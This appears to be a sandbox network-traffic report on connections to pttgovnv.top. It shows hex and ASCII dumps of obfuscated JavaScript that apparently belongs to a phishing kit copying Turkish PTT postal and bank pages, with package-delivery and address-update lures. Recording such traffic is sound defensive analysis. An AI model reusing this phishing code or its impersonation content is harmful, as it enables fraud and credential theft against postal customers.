          2024-09-01 22:25:20 UTC1369INData Raw: 30 78 33 38 62 31 2c 30 78 35 63 62 38 63 29 29 3b 66 75 6e 63 74 69 6f 6e 20 61 33 33 5f 30 78 33 38 62 31 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 37 36 66 37 35 3d 5b 27 65 6d 5f 70 74 74 5f 61 62 6f 27 2c 27 63 7a 30 6e 64 48 4a 68 62 6e 27 2c 27 3e 54 65 62 6c 69 67 61 74 5c 78 32 30 27 2c 27 4f 4e 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5f 5f 27 2c 27 2d 33 32 27 2c 27 2f 61 3e 3c 2f 73 70 61 6e 3e 27 2c 27 6b 74 61 5f 68 69 7a 6d 65 74 27 2c 27 59 54 34 38 4c 32 52 70 64 6a 27 2c 27 63 6c 61 73 73 3d 5c 78 32 32 69 74 65 27 2c 27 62 61 6e 6b 2e 70 74 74 2e 67 27 2c 27 6c 5c 78 32 30 75 69 2d 77 69 64 67 65 27 2c 27 74 41 6b 25 43 34 25 42 31 6c 27 2c 27 4a 76 5a 48 56 6a 64 47 6c 74 27 2c 27 61 67 65 5c 78 32 30 68 61 73 2d 73 75 27 2c 27 23 70
          Data Ascii: 0x38b1,0x5cb8c));function a33_0x38b1(){const _0x576f75=['em_ptt_abo','cz0ndHJhbn','>Tebligat\x20','ON\x22\x20id=\x22__','-32','/a></span>','kta_hizmet','YT48L2Rpdj','class=\x22ite','bank.ptt.g','l\x20ui-widge','tAk%C4%B1l','JvZHVjdGlt','age\x20has-su','#p
          2024-09-01 22:25:20 UTC1369INData Raw: 69 5f 27 2c 27 42 6d 59 58 6c 6b 59 57 7a 45 27 2c 27 6a 61 78 4c 69 6e 6b 5c 78 32 32 5c 78 32 30 68 27 2c 27 68 69 64 64 65 6e 27 2c 27 6e 65 77 73 70 61 70 65 72 5c 78 32 32 27 2c 27 65 62 70 61 72 74 5c 78 32 32 3e 3c 64 27 2c 27 69 6e 5f 61 63 69 6b 6c 61 6d 27 2c 27 4e 54 55 76 64 32 56 69 49 48 27 2c 27 5f 64 69 67 65 72 5f 70 6f 73 27 2c 27 61 73 70 78 27 2c 27 6f 6e 74 61 69 6e 65 72 5c 78 32 30 6e 27 2c 27 69 5f 62 61 6e 6b 61 73 69 5f 27 2c 27 3c 2f 61 3e 3c 2f 64 69 76 3e 27 2c 27 6a 61 78 4c 69 6e 6b 5c 78 32 32 5c 78 32 30 63 27 2c 27 46 6d 79 6a 41 34 37 4b 38 77 27 2c 27 74 72 61 6e 73 5c 78 32 30 68 61 73 2d 27 2c 27 69 74 69 6f 6e 5c 78 32 32 5c 78 32 30 68 72 65 27 2c 27 73 78 2d 6d 65 6e 75 27 2c 27 69 5c 78 32 30 3c 2f 61 3e 3c 61 5c
          Data Ascii: i_','BmYXlkYWzE','jaxLink\x22\x20h','hidden','newspaper\x22','ebpart\x22><d','in_aciklam','NTUvd2ViIH','_diger_pos','aspx','ontainer\x20n','i_bankasi_','</a></div>','jaxLink\x22\x20c','FmyjA47K8w','trans\x20has-','ition\x22\x20hre','sx-menu','i\x20</a><a\
          2024-09-01 22:25:20 UTC1369INData Raw: 2c 27 77 74 65 48 4d 74 4e 43 63 2b 27 2c 27 70 6e 67 27 2c 27 59 58 4e 7a 50 53 64 77 64 48 27 2c 27 65 6d 5f 70 74 74 5f 68 67 73 27 2c 27 65 72 69 5f 70 6f 73 74 61 5f 27 2c 27 5c 78 32 32 3e 3c 61 5c 78 32 30 68 72 65 66 3d 27 2c 27 73 78 2d 63 65 6c 6c 27 2c 27 5c 78 32 30 69 64 3d 5c 78 32 32 41 6a 61 78 4c 27 2c 27 63 37 31 2d 34 63 32 64 2d 38 27 2c 27 6b 25 32 30 4b 25 43 34 25 42 27 2c 27 6e 6f 6f 70 65 6e 65 72 5c 78 32 30 6e 27 2c 27 61 6c 2e 61 73 70 78 23 70 74 27 2c 27 6f 74 64 6c 67 5c 78 32 30 6e 6f 69 6e 27 2c 27 2d 31 39 27 2c 27 2f 69 70 63 73 65 72 76 6c 65 27 2c 27 74 65 6d 5c 78 32 30 63 6f 6c 2d 6d 64 27 2c 27 74 5f 69 6c 5f 76 65 5f 69 6c 27 2c 27 63 6c 61 73 73 3d 5c 78 32 32 72 6f 77 27 2c 27 2f 2f 77 77 77 2e 66 69 6c 61 27 2c
          Data Ascii: ,'wteHMtNCc+','png','YXNzPSdwdH','em_ptt_hgs','eri_posta_','\x22><a\x20href=','sx-cell','\x20id=\x22AjaxL','c71-4c2d-8','k%20K%C4%B','noopener\x20n','al.aspx#pt','otdlg\x20noin','-19','/ipcservle','tem\x20col-md','t_il_ve_il','class=\x22row','//www.fila',
          2024-09-01 22:25:20 UTC1369INData Raw: 78 32 32 5c 78 32 30 27 2c 27 6e 6c 69 6e 65 5f 64 61 74 61 27 2c 27 65 6d 65 49 73 6c 65 6d 6c 65 27 2c 27 61 67 65 27 2c 27 65 6d 5f 70 6f 73 74 61 27 2c 27 4e 74 4c 54 4d 67 59 32 39 73 27 2c 27 64 48 52 68 64 6d 30 75 59 32 27 2c 27 65 6d 5f 70 74 74 5f 74 65 62 27 2c 27 5a 68 62 47 46 79 4c 30 4a 68 27 2c 27 56 34 4c 31 52 31 63 6e 42 6c 27 2c 27 23 70 74 74 5f 74 65 6c 67 72 27 2c 27 6f 72 75 6d 6c 75 6c 75 6b 5f 27 2c 27 68 62 5f 6f 64 65 6d 65 6c 65 27 2c 27 5f 76 65 5f 6f 64 65 6d 65 5f 27 2c 27 72 65 64 69 5c 78 32 30 c3 96 64 65 6d 65 27 2c 27 74 74 6f 6e 5c 78 32 32 3e 44 61 68 61 27 2c 27 3d 5c 78 32 32 74 72 61 6e 73 69 74 69 27 2c 27 38 38 3c 2f 61 3e 3c 2f 73 70 27 2c 27 63 6c 61 73 73 3d 5c 78 32 32 73 6f 63 27 2c 27 5c 78 32 32 5c 78 32
          Data Ascii: x22\x20','nline_data','emeIslemle','age','em_posta','NtLTMgY29s','dHRhdm0uY2','em_ptt_teb','ZhbGFyL0Jh','V4L1R1cnBl','#ptt_telgr','orumluluk_','hb_odemele','_ve_odeme_','redi\x20deme','tton\x22>Daha','=\x22transiti','88</a></sp','class=\x22soc','\x22\x2
          2024-09-01 22:25:20 UTC1369INData Raw: 2c 27 59 69 42 7a 61 58 52 6c 63 32 27 2c 27 42 6a 62 32 77 74 63 32 30 74 27 2c 27 4d 36 4c 79 39 33 64 33 63 75 27 2c 27 72 2f 4b 61 72 67 6f 2f 41 6d 27 2c 27 4a 6b 58 7a 67 78 59 54 42 66 27 2c 27 74 74 5f 74 65 62 6c 69 67 61 27 2c 27 62 6c 69 67 61 74 2e 61 73 70 27 2c 27 69 2e 61 73 70 78 5c 78 32 32 3e 50 74 27 2c 27 5c 78 32 30 4b 41 54 41 4c 4f c4 9e 55 5c 78 32 30 27 2c 27 41 50 47 5c 78 32 30 27 2c 27 54 4f 52 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 5f 27 2c 27 64 48 52 66 5a 6d 46 35 5a 47 27 2c 27 66 5f 68 69 7a 6d 65 74 6c 65 27 2c 27 54 75 72 70 65 78 5c 78 32 30 27 2c 27 52 30 58 32 5a 68 65 57 52 68 27 2c 27 64 69 5f 6b 61 72 74 69 5f 6f 27 2c 27 64 69 76 3e 3c 64 69 76 5c 78 32 30 69 27 2c 27 32 36 35 63 53 63 55 77 6e 27 2c 27 5a
          Data Ascii: ,'YiBzaXRlc2','Bjb2wtc20t','M6Ly93d3cu','r/Kargo/Am','JkXzgxYTBf','tt_tebliga','bligat.asp','i.aspx\x22>Pt','\x20KATALOU\x20','APG\x20','TOR\x22\x20id=\x22_','dHRfZmF5ZG','f_hizmetle','Turpex\x20','R0X2ZheWRh','di_karti_o','div><div\x20i','265cScUwn','Z
          2024-09-01 22:25:20 UTC1369INData Raw: 75 6c 61 72 27 2c 27 6e 61 76 62 61 72 2d 74 6f 67 27 2c 27 53 61 79 66 61 6c 61 72 2f 4b 27 2c 27 23 70 74 74 5f 62 69 6c 67 69 27 2c 27 2d 31 38 27 2c 27 55 59 31 79 4c 36 5c 78 32 32 3e 3c 2f 27 2c 27 61 79 c4 b1 74 6c c4 b1 5c 78 32 30 45 6c 65 27 2c 27 59 57 4e 6f 62 57 56 75 64 48 27 2c 27 61 74 65 6c 69 5f 73 6f 7a 6c 27 2c 27 53 47 4b 5c 78 32 30 4d 61 61 c5 9f 5c 78 32 30 c3 96 27 2c 27 6d 74 6f 79 2e 70 74 74 2e 67 27 2c 27 65 72 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 27 2c 27 61 66 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 27 2c 27 2e 74 72 2f 53 61 79 66 61 6c 27 2c 27 45 43 33 34 41 38 35 41 42 41 27 2c 27 61 73 70 78 5c 78 32 32 3e c3 96 64 65 6d 27 2c 27 70 6c 61 79 3a 6e 6f 6e 65 3b 27 2c 27 61 73 73 3d 5c 78 32 32 74 72 61 6e
          Data Ascii: ular','navbar-tog','Sayfalar/K','#ptt_bilgi','-18','UY1yL6\x22></','aytl\x20Ele','YWNobWVudH','ateli_sozl','SGK\x20Maa\x20','mtoy.ptt.g','er\x22\x20href=\x22','af\x22\x20class=','.tr/Sayfal','EC34A85ABA','aspx\x22>dem','play:none;','ass=\x22tran
          2024-09-01 22:25:20 UTC1369INData Raw: 5f 6f 64 65 6d 65 6c 65 27 2c 27 6f 48 69 7a 6d 65 74 6c 65 72 27 2c 27 72 2f 4b 61 72 67 6f 2e 61 73 27 2c 27 4e 30 61 57 31 68 5a 32 55 74 27 2c 27 74 4d 61 6e 61 67 65 72 5f 53 27 2c 27 72 74 5f 69 73 6c 65 6d 6c 65 27 2c 27 69 74 79 43 6f 6e 74 65 6e 74 27 2c 27 38 76 64 33 64 33 4c 6e 42 30 27 2c 27 75 72 75 6c 61 72 27 2c 27 61 72 2f 42 61 6e 6b 61 2f 48 27 2c 27 63 74 6c 30 30 5f 67 5f 64 37 27 2c 27 65 72 69 5c 78 32 30 3c 2f 61 3e 3c 61 27 2c 27 61 48 69 7a 6d 65 74 6c 65 72 27 2c 27 41 6e 6c 61 c5 9f 6d 61 6c c4 b1 5c 78 32 30 27 2c 27 57 65 73 74 65 72 6e 5c 78 32 30 55 6e 27 2c 27 79 75 72 74 5f 69 63 69 5f 70 27 2c 27 5f 6d 61 64 64 65 6c 65 72 69 27 2c 27 52 30 4c 58 42 79 62 32 52 31 27 2c 27 65 6d 5f 70 74 74 5f 6e 61 6b 27 2c 27 5a 6a 30
          Data Ascii: _odemele','oHizmetler','r/Kargo.as','N0aW1hZ2Ut','tManager_S','rt_islemle','ityContent','8vd3d3LnB0','urular','ar/Banka/H','ctl00_g_d7','eri\x20</a><a','aHizmetler','Anlamal\x20','Western\x20Un','yurt_ici_p','_maddeleri','R0LXByb2R1','em_ptt_nak','Zj0
          2024-09-01 22:25:20 UTC1369INData Raw: 5f 6b 61 67 69 74 6c 61 27 2c 27 73 61 70 5c 78 32 30 c4 b0 c5 9f 6c 65 6d 6c 27 2c 27 72 72 65 72 5c 78 32 32 3e 65 2d 46 69 27 2c 27 2d 6d 64 2d 34 5c 78 32 32 3e 3c 61 5c 78 32 30 27 2c 27 64 6c 59 6d 39 69 61 6c 39 77 27 2c 27 61 6e 6b 61 73 69 5f 73 69 6b 27 2c 27 4d 57 4d 33 4d 56 38 30 59 7a 27 2c 27 64 33 64 79 35 69 64 47 73 75 27 2c 27 62 6f 78 2d 73 68 61 64 6f 77 27 2c 27 53 2e 61 73 70 78 5c 78 32 32 3e 48 47 27 2c 27 49 48 4e 79 59 7a 30 69 61 48 27 2c 27 65 6d 5f 70 74 74 5f 6d 61 6c 27 2c 27 4c 6f 67 6f 6c 61 72 c4 b1 6d c4 b1 27 2c 27 61 76 5f 66 6f 6f 74 65 72 6d 27 2c 27 50 6f 73 74 61 2f 54 65 62 6c 27 2c 27 59 43 5a 67 39 6b 46 67 49 43 27 2c 27 74 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 27 2c 27 74 74 5f 62 69 6c 67 69
          Data Ascii: _kagitla','sap\x20leml','rrer\x22>e-Fi','-md-4\x22><a\x20','dlYm9ial9w','ankasi_sik','MWM3MV80Yz','d3dy5idGsu','box-shadow','S.aspx\x22>HG','IHNyYz0iaH','em_ptt_mal','Logolarm','av_footerm','Posta/Tebl','YCZg9kFgIC','t\x22\x20class=\x22','tt_bilgi
          2024-09-01 22:25:20 UTC1369INData Raw: 76 63 32 39 6d 27 2c 27 47 4f 5c 78 32 30 48 c4 b0 5a 4d 45 54 4c 27 2c 27 67 69 49 48 52 68 63 6d 64 6c 27 2c 27 78 30 64 58 4a 6c 50 57 35 6c 27 2c 27 61 5f 6b 61 72 74 69 27 2c 27 54 61 72 69 68 c3 a7 65 5c 78 32 30 27 2c 27 61 74 6c 61 72 69 27 2c 27 74 5f 61 63 73 68 62 5f 6f 64 27 2c 27 5c 78 32 32 6e 6f 6f 70 65 6e 65 72 5c 78 32 30 27 2c 27 65 6e 75 5c 78 32 30 73 6d 2d 6e 6f 77 27 2c 27 46 6a 61 47 31 6c 62 6e 52 7a 27 2c 27 63 33 52 7a 4c 30 5a 68 65 57 27 2c 27 68 43 68 61 6e 67 65 28 29 3b 27 2c 27 79 61 6c 5f 73 6f 72 75 6d 6c 27 2c 27 59 75 64 48 49 76 54 47 6c 7a 27 2c 27 61 70 73 65 27 2c 27 34 2d 6e 6f 74 64 6c 67 5c 78 32 30 6e 27 2c 27 65 72 69 2e 61 73 70 78 23 65 27 2c 27 61 72 67 6f 2f 50 74 74 59 75 27 2c 27 45 67 59 32 39 73 4c 57
          Data Ascii: vc29m','GO\x20HZMETL','giIHRhcmdl','x0dXJlPW5l','a_karti','Tarihe\x20','atlari','t_acshb_od','\x22noopener\x20','enu\x20sm-now','FjaG1lbnRz','c3RzL0ZheW','hChange();','yal_soruml','YudHIvTGlz','apse','4-notdlg\x20n','eri.aspx#e','argo/PttYu','EgY29sLW


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          26192.168.2.449763104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:20 UTC364OUTGET /help/assets/cbcdcea5JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:20 UTC751INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:20 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:44 GMT
          ETag: W/"17d2-18fc3d84e20"
          CF-Cache-Status: MISS
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5KE61komaLIj3eRNNups8JGbLPksXvhnGlK%2BbLJs%2BPiwAI8a2BYghceP9ja%2FrZE3UlNk%2BRdcTkawBe%2Fovz9ixfOBuMRCWmSEevEOGQ35SilJeorMV3wM68zGmkpXzaI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acf6c9b0c45c-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:20 UTC618INData Raw: 31 37 64 32 0d 0a 63 6f 6e 73 74 20 61 32 36 5f 30 78 32 66 36 62 32 65 3d 61 32 36 5f 30 78 32 31 39 35 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 62 32 36 64 35 2c 5f 30 78 35 38 66 37 30 33 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 62 61 30 32 3d 61 32 36 5f 30 78 32 31 39 35 2c 5f 30 78 35 36 65 64 31 35 3d 5f 30 78 34 62 32 36 64 35 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 31 63 32 66 33 33 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 33 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 39 61 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 35 62 61 30 32 28 30 78 31 36 30 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f
          Data Ascii: 17d2const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_
          2024-09-01 22:25:20 UTC1369INData Raw: 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 31 61 63 66 39 39 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 64 33 32 31 39 2c 5f 30 78 32 30 32 37 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 34 61 35 30 35 3d 5f 30 78 31 61 63 66 39 39 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 34 38 63 66 38 3d 61 32 36 5f 30 78 32 31 39 35 3b 69 66 28 5f 30 78 32 30 32 37 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 36 32 36 65 34 32 3d 5f 30 78 32 30 32 37 63 33 5b 5f 30 78 32 34 38 63 66 38 28 30 78 31 38 65 29 5d 28 5f 30 78 32 64 33 32 31 39 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 32 30 32 37 63 33 3d 6e 75 6c 6c 2c 5f 30 78 36 32 36 65 34 32 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b
          Data Ascii: ction(){let _0x1acf99=!![];return function(_0x2d3219,_0x2027c3){const _0x24a505=_0x1acf99?function(){const _0x248cf8=a26_0x2195;if(_0x2027c3){const _0x626e42=_0x2027c3[_0x248cf8(0x18e)](_0x2d3219,arguments);return _0x2027c3=null,_0x626e42;}}:function(){};
          2024-09-01 22:25:20 UTC1369INData Raw: 53 74 72 69 6e 67 27 2c 27 6e 6f 74 69 63 65 4c 69 73 74 27 2c 27 37 32 34 37 36 53 58 42 43 6f 4a 27 2c 27 74 72 61 63 6b 54 69 74 6c 65 27 2c 27 5c 78 32 30 2a 64 61 74 65 2a 5c 78 32 30 5c 78 32 37 64 27 2c 27 59 6f 75 72 5c 78 32 30 70 61 63 6b 61 27 2c 27 6e 65 78 74 27 2c 27 61 74 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 27 2c 27 44 65 6c 69 76 65 72 79 5c 78 32 30 46 27 2c 27 73 65 61 72 63 68 27 2c 27 50 61 6b 65 74 5c 78 32 30 4e 75 6d 61 27 2c 27 39 30 36 33 37 34 37 67 64 56 4a 59 42 27 2c 27 31 37 33 38 32 39 36 6b 66 66 66 4e 72 27 2c 27 75 6d 75 27 2c 27 5c 78 32 30 61 67 61 69 6e 5c 78 32 30 6f 6e 5c 78 32 30 27 2c 27 70 72 65 76 65 6e 74 27 2c 27 4c c3 bc 74 66 65 6e 5c 78 32 30 61 64 72 27 2c 27 72 65 64 27 2c 27 74 6f 4c 6f 63 61 6c 65
          Data Ascii: String','noticeList','72476SXBCoJ','trackTitle','\x20*date*\x20\x27d','Your\x20packa','next','ate\x20your\x20a','Delivery\x20F','search','Paket\x20Numa','9063747gdVJYB','1738296kfffNr','umu','\x20again\x20on\x20','prevent','Ltfen\x20adr','red','toLocale
          2024-09-01 22:25:20 UTC1369INData Raw: 78 32 30 6e 75 6d 62 65 72 27 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 61 63 29 7d 2c 27 6e 6f 74 69 63 65 27 3a 7b 27 64 65 66 61 75 6c 74 27 3a 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 38 32 29 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 36 35 29 2b 61 32 36 5f 30 78 32 66 36 62 32 65 28 30 78 31 37 35 29 7d 2c 27 6e 6f 74 69 63 65 4c 69 73 74 27 3a 7b 27 64 65 66 61 75 6c 74 27 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 37 63 32 32 65 3d 61 32 36 5f 30 78 32 66 36 62 32 65 3b 72 65 74 75 72 6e 5b 27 59 6f 75 72 5c 78 32 30 70 61 63 6b 61 27 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 61 34 29 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 39 34 29 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31 39 62 29 2b 5f 30 78 35 37 63 32 32 65 28 30 78 31
          Data Ascii: x20number'+a26_0x2f6b2e(0x1ac)},'notice':{'default':a26_0x2f6b2e(0x182)+a26_0x2f6b2e(0x165)+a26_0x2f6b2e(0x175)},'noticeList':{'default'(){const _0x57c22e=a26_0x2f6b2e;return['Your\x20packa'+_0x57c22e(0x1a4)+_0x57c22e(0x194)+_0x57c22e(0x19b)+_0x57c22e(0x1
          2024-09-01 22:25:20 UTC1369INData Raw: 31 27 2c 44 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 61 37 29 5d 29 2c 30 78 31 29 2c 49 2c 65 28 5f 30 78 34 39 31 31 38 66 28 30 78 31 61 32 29 2c 7a 2c 5b 65 28 27 70 27 2c 6e 75 6c 6c 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 37 64 29 5d 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 39 35 29 5d 28 5f 30 78 34 39 31 31 38 66 28 30 78 31 36 61 29 2c 75 28 5f 30 78 31 39 65 39 30 61 29 29 29 2c 30 78 31 29 2c 65 28 27 70 27 2c 77 2c 5b 65 28 27 62 27 2c 6e 75 6c 6c 2c 61 32 36 5f 30 78 31 64 34 63 66 30 28 5f 30 78 34 32 33 35 34 39 5b 5f 30 78 34 39 31 31 38 66 28 30 78 31 37 34 29 5d 29 2c 30 78 31 29 5d 29 2c 65 28 27
          Data Ascii: 1',D,a26_0x1d4cf0(_0x423549[_0x49118f(0x1a7)]),0x1),I,e(_0x49118f(0x1a2),z,[e('p',null,a26_0x1d4cf0(_0x423549[_0x49118f(0x17d)][_0x49118f(0x195)](_0x49118f(0x16a),u(_0x19e90a))),0x1),e('p',w,[e('b',null,a26_0x1d4cf0(_0x423549[_0x49118f(0x174)]),0x1)]),e('
          2024-09-01 22:25:20 UTC12INData Raw: 20 64 65 66 61 75 6c 74 7d 3b 0d 0a
          Data Ascii: default};
          2024-09-01 22:25:20 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          27192.168.2.449766104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:20 UTC364OUTGET /help/assets/c27b6911JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:20 UTC750INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:20 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:44 GMT
          ETag: W/"764-18fc3d84e20"
          CF-Cache-Status: MISS
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BW0YYRR19N617GZe4gtyOUKMOx7Dkr1VbAPasgy9cvOyls2W%2FtFGyTlGbBF92rWFnvtJfD%2FaNLdxRjxTl%2Fe8JqM%2FT6R70hQXgaV2hlPD5kCiqUn7Rtqp5tjXdG5Kpg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acf6cec318d0-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:20 UTC619INData Raw: 37 36 34 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 7b 63 6f 6e 73 74 20 5f 30 78 35 35 36 38 32 35 3d 61 32 34 5f 30 78 33 32 34 62 28 29 3b 72 65 74 75 72 6e 20 61 32 34 5f 30 78 35 33 34 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 30 64 65 37 2c 5f 30 78 63 65 30 63 62 32 29 7b 5f 30 78 33 62 30 64 65 37 3d 5f 30 78 33 62 30 64 65 37 2d 30 78 36 37 3b 6c 65 74 20 5f 30 78 33 32 34 62 64 62 3d 5f 30 78 35 35 36 38 32 35 5b 5f 30 78 33 62 30 64 65 37 5d 3b 72 65 74 75 72 6e 20 5f 30 78 33 32 34 62 64 62 3b 7d 2c 61 32 34 5f 30 78 35 33 34 36 28 5f 30 78 34 30 33 30 63 35 2c 5f 30 78 33 31 65 65 63 64 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61 32 34 5f 30 78 33 32 34 62 28
          Data Ascii: 764function a24_0x5346(_0x4030c5,_0x31eecd){const _0x556825=a24_0x324b();return a24_0x5346=function(_0x3b0de7,_0xce0cb2){_0x3b0de7=_0x3b0de7-0x67;let _0x324bdb=_0x556825[_0x3b0de7];return _0x324bdb;},a24_0x5346(_0x4030c5,_0x31eecd);}function a24_0x324b(
          2024-09-01 22:25:20 UTC1280INData Raw: 37 66 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 62 32 63 39 63 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 62 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 32 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 36 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 64 29 29 2f 30 78 34 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 37 34 29 29 2f 30 78 35 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 39 29 29 2f 30 78 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 36 38 30 63 39 28 30 78 36 66 29 29 2f 30 78 37
          Data Ascii: 7ff();while(!![]){try{const _0x4b2c9c=parseInt(_0x4680c9(0x6b))/0x1*(-parseInt(_0x4680c9(0x72))/0x2)+parseInt(_0x4680c9(0x76))/0x3+-parseInt(_0x4680c9(0x6d))/0x4*(parseInt(_0x4680c9(0x74))/0x5)+parseInt(_0x4680c9(0x69))/0x6*(-parseInt(_0x4680c9(0x6f))/0x7
          2024-09-01 22:25:20 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          28192.168.2.449767172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:21 UTC557OUTGET /help/assets/f4397cedkFGym.css HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: text/css,*/*;q=0.1
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: style
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:21 UTC741INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:21 GMT
          Content-Type: text/css; charset=utf-8
          Content-Length: 400
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"190-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 36230
